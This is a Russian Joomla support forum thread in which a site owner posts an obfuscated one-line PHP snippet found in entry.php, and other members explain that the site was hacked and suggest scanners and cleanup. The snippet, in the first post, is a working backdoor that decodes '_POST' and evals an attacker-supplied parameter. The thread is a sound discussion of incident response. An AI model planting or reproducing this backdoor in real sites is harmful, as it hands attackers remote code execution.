Форум русской поддержки Joomla!® CMS
09.12.2016, 15:43:10 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Какой то код прописался в entry.php?

 (Прочитано 323 раз)
0 Пользователей и 1 Гость смотрят эту тему.
aslanamirov
Осваиваюсь на форуме
***

Репутация: +4/-0
Offline Offline

Пол: Мужской
Сообщений: 88


Ййехаа!


« : 21.04.2016, 03:30:35 »

Код:
$xlt7 ="utspeo_r" ; $cjk22 = $xlt7[2]. $xlt7[1].$xlt7[7].$xlt7[1]. $xlt7[5].$xlt7[0]. $xlt7[3].$xlt7[3]. $xlt7[4]. $xlt7[7]; $zgyh5 =$cjk22 ($xlt7[6]. $xlt7[3]. $xlt7[5].$xlt7[2].$xlt7[1] );if(isset ( ${ $zgyh5 }[ 'q493de8' ] )){ eval (${$zgyh5 } [ 'q493de8' ] ) ;}?> <?php

Сей код выдал ошибку что то про сессии, забыл заскринить. Код был вставлен в 1 строку с кучей пробелов после <?php

Что это? и откуда могло вылезти?

UPD: админку скрыл нужными плагинами. Joomla 3.5.0
« Последнее редактирование: 21.04.2016, 03:38:10 от aslanamirov » Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2659


step by step


« Ответ #1 : 21.04.2016, 08:29:59 »

 откуда Joomla ? Проверять сайт на вирусы, шелл
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3537


« Ответ #2 : 21.04.2016, 11:14:29 »

Вас взломали, лечите сайт и обновляйте.
Записан
aslanamirov
Осваиваюсь на форуме
***

Репутация: +4/-0
Offline Offline

Пол: Мужской
Сообщений: 88


Ййехаа!


« Ответ #3 : 21.04.2016, 11:35:18 »

откуда Joomla ? Проверять сайт на вирусы, шелл

А не подскажете чем лучше проверять сайт?
Записан
wishlight
Профи
********

Репутация: +201/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #4 : 21.04.2016, 11:45:43 »

https://www.revisium.com/ai/
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2659


step by step


« Ответ #5 : 21.04.2016, 12:08:31 »

По моему айболит на этот скрипт не реагирует.Рандомно меняются имя переменный и значения.
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3537


« Ответ #6 : 21.04.2016, 12:17:57 »

По моему айболит на этот скрипт не реагирует.Рандомно меняются имя переменный и значения.
Отреагирует там { eval присутствует не полностью обфусцировано, любой сканер покажет что файл надо проверить.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #7 : 21.04.2016, 21:31:41 »

По моему айболит на этот скрипт не реагирует.Рандомно меняются имя переменный и значения.
Реагирует!, в нем заложена эвристика подобных бегдоров, в которых принцип не в переменных, а в конструкции кода...
Записан
aslanamirov
Осваиваюсь на форуме
***

Репутация: +4/-0
Offline Offline

Пол: Мужской
Сообщений: 88


Ййехаа!


« Ответ #8 : 23.04.2016, 14:51:59 »


Блин, прогнал айболита нашел 43 шелла Sad
Кто может что подсказать каким образом эти гады лезут на сайт?
Обновил Joomla до 3.5.1 - поможет?
Записан
wishlight
Профи
********

Репутация: +201/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #9 : 23.04.2016, 16:38:44 »

Поздно уже. Кроме обновления надо вычистить все вредоносные коды и сменить пароли. На локалке желательно.
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3537


« Ответ #10 : 23.04.2016, 16:53:55 »

Заливают их через уязвимости движка и расширений, своевременное обновление помогает только до их появления, а раз уж они уже на сайте, то теперь надо выполнить чистку и потом уже обновлять все. В дальнейшем следить.
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet